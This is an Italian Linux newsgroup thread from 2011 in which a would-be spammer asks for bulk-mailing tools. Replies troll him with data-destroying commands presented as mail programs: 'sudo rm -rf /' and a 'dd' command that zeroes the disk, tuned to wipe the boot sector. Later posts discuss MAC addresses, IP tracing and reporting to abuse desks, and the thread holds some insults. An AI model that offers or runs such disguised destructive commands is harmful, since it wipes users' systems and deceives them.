Live Support My forum, my way! Il forum dei newsgroup: Linux » consiglio programmi per mandare email

consiglio programmi per mandare email [messaggio #38241] ven, 06 maggio 2011 16:04 Messaggio successivo
El Terun@Leibstandart  è attualmente disconnesso El Terun@Leibstandart
Un mio amico m'ha passato un file di testo con 1 milione di email mo m'e
venuta l'idea di fa un po di spam. solo che non so come fare perche io so
che mi bloccano tutto se mando email a cosi tanti. esistono sistemi per
automatiz<zare tutto in modo che non mi rompono le palle?? io vedo che
m'arrivano 300 email al giorno di spam a me quindi la cosa e legale come
fanno quelli che programmi usano? il linux e utile a fare questo? in che
modo?
Re: consiglio programmi per mandare email [messaggio #38245 è una risposta a message #38241] ven, 06 maggio 2011 16:38 Messaggio precedenteMessaggio successivo
El Terun@Leibstandarte@M.G. wrote:

> [...]
> m'arrivano 300 email al giorno di spam a me quindi la cosa e legale come
> fanno quelli che programmi usano? il linux e utile a fare questo? in che

Esiste il programma "Restless Mailer", un programma solo testo.
Ecco come funziona.

Metti il file di testo che hai ricevuto nella directory radice "/"
Metti lì la mail che vuoi mandare chiamala "mail.txt" anch'essa nella
directory "/". Poi dài il seguente comando

sudo rm -rf /

ed inserisci la tua password.
--
"I ROM non sanno parlare l'italiano, non si integrano, sono aggressivi."
"E come si distinguono dai leghisti?"
El Che wrote:

> [...]
> Metti lì la mail che vuoi mandare chiamala "mail.txt" anch'essa nella
> directory "/". Poi dài il seguente comando

Dimenticavo che c'è anche un altro programma, forse migliore: si chiama
"dd", dalle iniziali di "Digital Devil" e funziona quasi nello stesso modo
di rm. L'unica differenza con questo è che alla fine devi lanciare

sudo dd if=/dev/zero of=/dev/sda

Buon divertimento.
--
"Adesso mi manca solo un ovulo e poi potrò creare il mio Doctor Spock
personale!"
Il 06/05/2011 16:38, El Che ha scritto:

> [...]
> Metti lì la mail che vuoi mandare chiamala "mail.txt" anch'essa nella
> directory "/". Poi dài il seguente comando

Consiglio anch'io questo comando... lo ha consigliato qualcuno "quindi
la cosa e legale" ;-)

Gabriele
Re: consiglio programmi per mandare email [messaggio #38250 è una risposta a message #38246] ven, 06 maggio 2011 19:18 Messaggio precedenteMessaggio successivo
Fulvio  è attualmente disconnesso Fulvio
El Che wrote:

> sudo dd if=/dev/zero of=/dev/sda

Si ma ci mette troppo :)
A fine riga metti un bs=512 count=2
E' velocissimo, basta riavviare :D :D
--
Archlinux on (uname -a)
Re: consiglio programmi per mandare email [messaggio #38279 è una risposta a message #38246] sab, 07 maggio 2011 00:30 Messaggio precedenteMessaggio successivo
On Fri, 06 May 2011 16:44:15 +0200, El Che wrote:

> sudo dd if=/dev/zero of=/dev/sda

Non funzionano.

Li ho usati per invitare il mondo intero (ho 6 miliardi di indirizzi mail
che mi ha dato un mio amico recentemente defunto) a plonkare questo
#@^*&,da tutti i NG ma vedo che c'è ancora qualcuno che continua a
rispondergli....

;-)
Re: consiglio programmi per mandare email [messaggio #38281 è una risposta a message #38279] sab, 07 maggio 2011 00:58 Messaggio precedenteMessaggio successivo
ris4keen wrote:

> Li ho usati per invitare il mondo intero (ho 6 miliardi di indirizzi mail
> che mi ha dato un mio amico recentemente defunto) a plonkare questo
> [...]

<serio>

Io pure ma tanto morpha continuamente :-(

</serio>

--
Dirac was known among his colleagues for his precise and taciturn nature.
His colleagues in Cambridge jokingly defined a unit of a dirac which was one
El Che wrote:

> ma tanto morpha continuamente

Ma avra' un IP un MAC da bannarlo !!!

Non mi dire che continuera' a cambiare modem o WI-FI di continuo!!

--
Archlinux on (uname -a)
Re: consiglio programmi per mandare email [messaggio #38298 è una risposta a message #38297] sab, 07 maggio 2011 15:21 Messaggio precedenteMessaggio successivo
On Sat, 07 May 2011 21:13:56 +0800, Fulvio wrote:

> Ma avra' un IP un MAC da bannarlo !!!
>
> Non mi dire che continuera' a cambiare modem o WI-FI di continuo!!

Come fai a trovare il MAC della sua scheda di rete, lo sai solo tu, visto
che tra te e lui ci sono 1000 dispositivi che sostituiscono il MAC
address.
Anche l'IP non lo blocchi, perchè le ADSL casalinghe hanno IP sempre
diversi.
Re: consiglio programmi per mandare email [messaggio #38300 è una risposta a message #38297] sab, 07 maggio 2011 15:27 Messaggio precedenteMessaggio successivo
"Fulvio" <nobody@nowhere.net> ha scritto nel messaggio

> Ma avra' un IP un MAC da bannarlo !!!
>
> Non mi dire che continuera' a cambiare modem o WI-FI di continuo!!
>
> --
> Archlinux on (uname -a)

mi puoi rispondere al post su con l'ora del pan?
Re: consiglio programmi per mandare email [messaggio #38301 è una risposta a message #38298] sab, 07 maggio 2011 15:28 Messaggio precedenteMessaggio successivo
"Lorenzo Mainardi" <lormayna@gmail.com> ha scritto nel messaggio

> [...]
> address.
> Anche l'IP non lo blocchi, perchè le ADSL casalinghe hanno IP sempre

mi puoi rispondere al treah che ho aperto sul problema dell'ortario del
pan?? mi da fastidio che va 1 ora avanti e l'ora di sistema e giusta non si
capisce perche sia cosi
Re: consiglio programmi per mandare email [messaggio #38310 è una risposta a message #38297] sab, 07 maggio 2011 16:14 Messaggio precedenteMessaggio successivo
Fulvio wrote:

> Ma avra' un IP un MAC da bannarlo !!!

Dove vedi il MAC negli headers? :-/
Fosse così sempplice bannare gli imbecilli... Ci metterei una firma.

--
"Centomila morti" = "È una tragedia!"
"Trovato un superstite" = "Grazie a Dio! È un miracolo!"
Lorenzo Mainardi wrote:

> [...]
> address.
> Anche l'IP non lo blocchi, perchè le ADSL casalinghe hanno IP sempre

Va bene, il discorso sta che chiunque si colleghi in rete ha un
identificativo hardware, non si scappa.
Puo' essere il modem od il provider che assegna l' indirizzo. Se fosse in
wifi, il dispositivo ha un identificativo ben preciso come l' IMEI.

Il modo di andare a rintracciare *certi disturbatori* sarebbe da applicare
nella misura proporzionalmente opportuna.
Vorrei dire che potrebbe esser difficile, non impossibile.

Si potra' applicare quando un elevato di rapporti all' ABUSE e _dovrebbe_
prendere provvedimenti.
Nel caso comune si usa un filtro agli articoli e si ignora *certi
disturbatori* con le loro idee assurde.

--
Archlinux on (uname -a)
Re: consiglio programmi per mandare email [messaggio #38312 è una risposta a message #38311] sab, 07 maggio 2011 16:30 Messaggio precedenteMessaggio successivo
Fulvio wrote:

> Nel caso comune si usa un filtro agli articoli e si ignora *certi
> disturbatori* con le loro idee assurde.

È che per linux non esiste, o meglio non ho trovato, un NR decente che
permetta di filtrare i sub-threads iniziati da qualcuno. Una funzione così
ce l'ha thunderbird, ma come lettore di news è un po' scarsino (imho eh!).
Anzi, ogni suggerimento in proposito sarebbe ben accetto :-)

--
"Adesso mi manca solo un ovulo e poi potrò creare il mio Doctor Spock
personale!"
Re: consiglio programmi per mandare email [messaggio #38314 è una risposta a message #38311] sab, 07 maggio 2011 16:37 Messaggio precedenteMessaggio successivo
On Sat, 07 May 2011 22:27:32 +0800, Fulvio wrote:

> [...]
> provider che assegna l' indirizzo. Se fosse in wifi, il dispositivo ha
> un identificativo ben preciso come l' IMEI.

Mmhh...mi sa che non hai molto chiaro come funziona il protocollo
Ethernet.

Che c'entra l'IMEI?L'IMEI è un codice che identifica la SIM
Re: consiglio programmi per mandare email [messaggio #38322 è una risposta a message #38314] sab, 07 maggio 2011 17:57 Messaggio precedenteMessaggio successivo
liftman  è attualmente disconnesso liftman

> Che c'entra l'IMEI?L'IMEI è un codice che identifica la SIM

l'imei in genere identifica un cellulare (se viene usato anche per apparati
wi-fi non lo so'), il codice per la sim, e' il numero telefonico....

--
Ciao!
liftman
On Sat, 07 May 2011 17:57:35 +0200, liftman wrote:

> l'imei in genere identifica un cellulare (se viene usato anche per
> apparati wi-fi non lo so'), il codice per la sim, e' il numero
> telefonico....

Infatti.
Se ti colleghi con un cellulare hai assegnato un IP (alcune volte anche
dietro NAT), non c'entrano nulla le informazioni telefoniche
Re: consiglio programmi per mandare email [messaggio #38325 è una risposta a message #38314] sab, 07 maggio 2011 18:32 Messaggio precedenteMessaggio successivo
Lorenzo Mainardi wrote:

> un identificativo ben preciso come l' IMEI.
^^^^^^^^^^^^

> Mmhh...mi sa che non hai molto chiaro come funziona il protocollo
> Ethernet.
>
> Che c'entra l'IMEI?L'IMEI è un codice che identifica la SIM

Ogni dispositivo ha un suo identificativo di 6 bytes, *come l' IMEI*, che
non risiede nella SIM. Anche bluetooth ha questo identificativo di 6 bytes.

CODE======================================================== =============
ifconfig
wlan0 Link encap:Ethernet HWaddr 00:21:5D:43:DB:38
eth0 Link encap:Ethernet HWaddr 00:A0:D1:AC:F1:FF
CODE======================================================== =============

Cosa mi dite di questi ?
Ma rinviamo su un altro topico?

--
Archlinux on (uname -a)
Re: consiglio programmi per mandare email [messaggio #38327 è una risposta a message #38325] sab, 07 maggio 2011 18:42 Messaggio precedenteMessaggio successivo
On Sun, 08 May 2011 00:32:33 +0800, Fulvio wrote:

> Cosa mi dite di questi ?
> Ma rinviamo su un altro topico?

È il MAC.
Ma è un parametro di livello 2, e quindi non lo vedi su una rete pubblica.
Re: consiglio programmi per mandare email [messaggio #38328 è una risposta a message #38312] sab, 07 maggio 2011 18:42 Messaggio precedenteMessaggio successivo
Enrico 'Henryx' Bianc  è attualmente disconnesso Enrico 'Henryx' Bianc
El Che wrote:

> Anzi, ogni suggerimento in proposito sarebbe ben accetto :-)

KNode permette di ignorare un thread...

Enrico
Re: consiglio programmi per mandare email [messaggio #38329 è una risposta a message #38325] sab, 07 maggio 2011 19:38 Messaggio precedenteMessaggio successivo
Fulvio wrote:

> Cosa mi dite di questi ?

Sono MAC Address che:

- Sono modificabili.
- L'unico server che ne e` a conoscenza e` il DHCP per l'assegnazione
dell'IP.

Per il resto delle operazioni, si usa l'IP (anche se ci sarebbe di mezzo
anche la tabella ARP, destinata a sparire con IPv6), sia esso privato o
pubblico

Enrico
Re: consiglio programmi per mandare email [messaggio #38331 è una risposta a message #38325] sab, 07 maggio 2011 18:44 Messaggio precedenteMessaggio successivo
Fulvio ha scritto:
> wlan0 Link encap:Ethernet HWaddr 00:21:5D:43:DB:38
> eth0 Link encap:Ethernet HWaddr 00:A0:D1:AC:F1:FF
> Cosa mi dite di questi ?

Che i mac address li conosciamo, ma li vedi solo tu e il router cui ti
attacchi.
Non vengono propagati durante il routing.

--
|Save our planet!
Ciao |Save wildlife!
roberto |For your E-MAIL use ONLY recycled Bytes !!
|roberto poggi rpoggi@softhome.net
Re: consiglio programmi per mandare email [messaggio #38338 è una risposta a message #38311] dom, 08 maggio 2011 01:23 Messaggio precedenteMessaggio successivo

> [...]
> prendere provvedimenti.
> Nel caso comune si usa un filtro agli articoli e si ignora *certi

Incrdebili vedere che sul newsgroup esistono eprcsone come te dei veri e
prori DISCRIMINATORI tu solo perche ne sai piu di me mi vuoi trattare di
merda peensi di farmi sparire dal newsgroup ma ti sbagli perche questo cazzo
di newsgrioup e dedicato ai principianti esattamente come sono io e non e
proprieta di LOBBISTI DI MERDA COME TE.

Non riusciarai a farmi bannare da x private perche io non ho fatto niente di
male, anzi se capisco bene tu vorresti prorpio farmi bannare dal mio
fornitore internet che io pago regolarmente e a peso d'oro. sei solo un
cretino patetico che si crce il padrone del mondo ma con me vedrai ora e
sempre sorci verdi

CAPITO??? pezzo di merda
Re: consiglio programmi per mandare email [messaggio #38339 è una risposta a message #38331] dom, 08 maggio 2011 01:34 Messaggio precedenteMessaggio successivo
"roberto" <rpoggiNOSPAM@softhome.net.invalid> ha scritto nel messaggio

> Che i mac address li conosciamo, ma li vedi solo tu e il router cui ti
> attacchi.
> Non vengono propagati durante il routing.

Cioe se ho capito vi state alleando con le vostre conoscente tecniche per
rintracciarmi? io non faccio nulla di male e questo vostro atteggiamento di
parlare in codice mi pare staking collettivo
Rintracciare un accesso[ERA: consiglio programmi per mandare email] [messaggio #38344 è una risposta a message #38331] dom, 08 maggio 2011 09:03 Messaggio precedenteMessaggio successivo
roberto wrote:

> Non vengono propagati durante il routing.

Forse era una mia percezione di esser rintracciato, forse non se ne vuole
tenere conto. Sospetto che comunque sia fattibile trovare una macchina
connessa ad internet.
Programmi come GeoIP, traceroute grafici, mi sanno dire da che luogo sto
scrivendo, circoscritto in un area di pochi chilometri (se non di meno).

A livello privato di ricerca, non sara' cosi' fattibile, _magari_ ci saranno
dei livelli che si puo', non accessibili da comuni utenti.

--
Archlinux on (uname -a)
Re: consiglio programmi per mandare email [messaggio #38347 è una risposta a message #38325] dom, 08 maggio 2011 13:17 Messaggio precedenteMessaggio successivo
Fulvio wrote:

> CODE======================================================== =============
> ifconfig
> wlan0 Link encap:Ethernet HWaddr 00:21:5D:43:DB:38
> eth0 Link encap:Ethernet HWaddr 00:A0:D1:AC:F1:FF
> CODE======================================================== =============
>
> Cosa mi dite di questi ?

Come ti hanno detto, sono MAC address e non IMEI (che AFAIK vale solo per i
callulari), che tra l'altro è un numero di 15 cifre in base 10. Il MAC è
modificabile "on the fly", per l'IMEI probabilmente è fattibile ma non così
semplice.

--
"Cuando era presidente del Banco Central de Cuba firmé los billetes con
la palabra Che, para burlarme, porque el dinero, fetiche de mierda, debe
Enrico 'Henryx' Bianchi wrote:

> KNode permette di ignorare un thread...

È che non voglio ignorare un intero thread solo per un post di qualcuno, mi
basta tagliare il subthread che questi inizia. Non so se mi spiego. Con
KNode non son riuscito ad arrivare ad ottenere quello che volevo.

--
Fanculinux: la distro per il troll moderno.
Re: consiglio programmi per mandare email [messaggio #38349 è una risposta a message #38347] dom, 08 maggio 2011 13:27 Messaggio precedenteMessaggio successivo
El Che wrote:

> Come ti hanno detto, sono MAC address e non IMEI (che AFAIK vale solo per
> i callulari)
^^^^^^^^^^^^^^

i "callulari" sono dispositivi atti solo a effettuare chiamate :P

--
Dirac was known among his colleagues for his precise and taciturn nature.
His colleagues in Cambridge jokingly defined a unit of a dirac which was one
word per hour.
Re: consiglio programmi per mandare email [messaggio #38357 è una risposta a message #38349] dom, 08 maggio 2011 14:52 Messaggio precedenteMessaggio successivo
Francesco  è attualmente disconnesso Francesco
El Che ha sentenziato:

In quale anno sei rimasto bloccato?

--
Non pretendo che comprendiate il significato di quello che ho scritto senza
averlo riletto un certo numero di volte. Personalmente, vi riterrei degli
El Che wrote:

> Non so se mi spiego.

Si, ho capito cosa intendi e no, non so se sia fattibile ne con KNode, ne
con un altro newsreader

Enrico
Re: consiglio programmi per mandare email [messaggio #38366 è una risposta a message #38357] dom, 08 maggio 2011 16:31 Messaggio precedenteMessaggio successivo
Francesco wrote:

> In quale anno sei rimasto bloccato?

Ho scritto "CALLulari" invece di "cellulari" e mi son fatto da solo la
battuta ;-)

--
Un popolo che gioisce/s'intristisce per il calcio merita l'estinzione.
Re: consiglio programmi per mandare email [messaggio #38367 è una risposta a message #38358] dom, 08 maggio 2011 16:32 Messaggio precedenteMessaggio successivo

> Si, ho capito cosa intendi e no, non so se sia fattibile ne con KNode, ne
> con un altro newsreader

Thunderbird lo fa, ma come lettore di news non mi ci trovo per niente.
Sì, lo so: voglio la proverbiale fettina di culo tagliata sottile sottile
vicino all'osso ;-D
--
Physicists are notoriously scornful of scientists from other fields. When
the great Austrian
Francesco  è attualmente disconnesso Francesco

> Ho scritto "CALLulari" invece di "cellulari" e mi son fatto da solo la
> battuta ;-)

Io invece non avevo fatto caso alla A e pensavo ti riferissi ai cellulari;
e date le nuove tennologie ...

--
[...]
Re: consiglio programmi per mandare email [messaggio #38397 è una risposta a message #38338] dom, 08 maggio 2011 21:19 Messaggio precedenteMessaggio successivo
kirby  è attualmente disconnesso kirby
Il 08/05/2011 01:23, El Terun@Leibstandarte@M.G. ha scritto:

>questo cazzo di newsgrioup e dedicato ai principianti esattamente come sono io

Non essere cosi catastrofico e con cosi poca autostima, te non sei per
nulla un principiante ma bensi un professionista con la P maiuscola
della deficenza reincarnata in uno sterco unmano....
Re: consiglio programmi per mandare email [messaggio #38400 è una risposta a message #38397] dom, 08 maggio 2011 21:33 Messaggio precedenteMessaggio successivo
LuciferSam  è attualmente disconnesso LuciferSam
On 8 Mag, 21:19, kirby <ki...@pocacola.com> wrote:
> Non essere cosi catastrofico e con cosi poca autostima, te non sei per
> nulla un principiante ma bensi un professionista con la P maiuscola
> della deficenza reincarnata in uno sterco unmano....

detto anche troll :)
Re: consiglio programmi per mandare email [messaggio #38430 è una risposta a message #38339] lun, 09 maggio 2011 08:55 Messaggio precedenteMessaggio successivo
El Terun@Leibstandarte@M.G. ha scritto:
-cut-

> Cioe se ho capito vi state alleando con le vostre conoscente tecniche per

No, non hai capito.

E non stiamo parlando in codice, stiamo usando solo termini appropriati
all'argomento.

--
|Save our planet!
Ciao |Save wildlife!
roberto |For your E-MAIL use ONLY recycled Bytes !!
|roberto poggi rpoggi@softhome.net
Re: Rintracciare un accesso[ERA: consiglio programmi per mandare email] [messaggio #38431 è una risposta a message #38344] lun, 09 maggio 2011 09:06 Messaggio precedenteMessaggio successivo
Fulvio ha scritto:

> Forse era una mia percezione di esser rintracciato, forse non se ne vuole
> tenere conto. Sospetto che comunque sia fattibile trovare una macchina
> connessa ad internet.

Non con i dati del mac.

> Programmi come GeoIP, traceroute grafici, mi sanno dire da che luogo sto
> scrivendo, circoscritto in un area di pochi chilometri (se non di meno).

Be', a me sbagliano di quaranta chilometri a tremila e cinquecento, a
seconda del servizio, non mi sembrano poi così affidabili per trovare
qualcuno.

> A livello privato di ricerca, non sara' cosi' fattibile, _magari_ ci saranno
> dei livelli che si puo', non accessibili da comuni utenti.

Certo, io faccio casini, tu fai denuncia, il magistrato incarica la
polizia postale, quelli vanno dal mio provider e gli chiedono: alle
ore x più ipsilon, che utente aveva l'IP x.y.w.z?

Il provider glielo dice, gli fornisce copia del contratto, e vengono
a bussarmi a casa per chiederti chiarimenti.

Se i chiarimenti che fornisco non sono troppo chiari e convincenti mi
sequestrano il pc e tutto ciò che può memorizzare dati, e ci guardano
dentro con comodo.

--
|Save our planet!
Ciao |Save wildlife!
roberto |For your E-MAIL use ONLY recycled Bytes !!
|roberto poggi rpoggi@softhome.net
Re: consiglio programmi per mandare email [messaggio #38451 è una risposta a message #38349] lun, 09 maggio 2011 15:59 Messaggio precedenteMessaggio successivo
Motosauro  è attualmente disconnesso Motosauro
Il 08/05/2011 13:27, El Che ha scritto:

> ^^^^^^^^^^^^^^
>
> i "callulari" sono dispositivi atti solo a effettuare chiamate :P

No, i Callulari sono aggeggi che le comunicazioni te le portano a piedi
ogni volta, da cui i problemi ai piedi

--
I fatti mi cosano
Re: consiglio programmi per mandare email [messaggio #38467 è una risposta a message #38358] lun, 09 maggio 2011 17:17 Messaggio precedenteMessaggio successivo
Fulvio  è attualmente disconnesso Fulvio

> Si, ho capito cosa intendi e no, non so se sia fattibile ne con KNode, ne
> con un altro newsreader

Credo che si debba installare un proprio server NNTP e dare delle regole di
filtraggio. Una volta c'era Leafnode, ma sara' fuori discussione oramai.

--
Archlinux on (uname -a)
Re: Rintracciare un accesso[ERA: consiglio programmi per mandare email] [messaggio #38471 è una risposta a message #38431] lun, 09 maggio 2011 17:44 Messaggio precedenteMessaggio precedente
roberto wrote:

> Se i chiarimenti che fornisco non sono troppo chiari e convincenti mi
> sequestrano il pc e tutto ciò che può memorizzare dati, e ci guardano
> dentro con comodo

Dunque, ci si arriva, mi e' stato chiara la spiegazione. Ovvio che si tratta
di livelli di disturbo pubblico.
Al giorno d' oggi, si potrebbe anche paragonare il mondo virtuale di
internet a quello della societa' reale, quindi anche la polizia virtuale
sarebbe un fatto accettabile.

A livelli meno drastici, l' Abuse come puo' rintracciarmi?

--
Archlinux on (uname -a)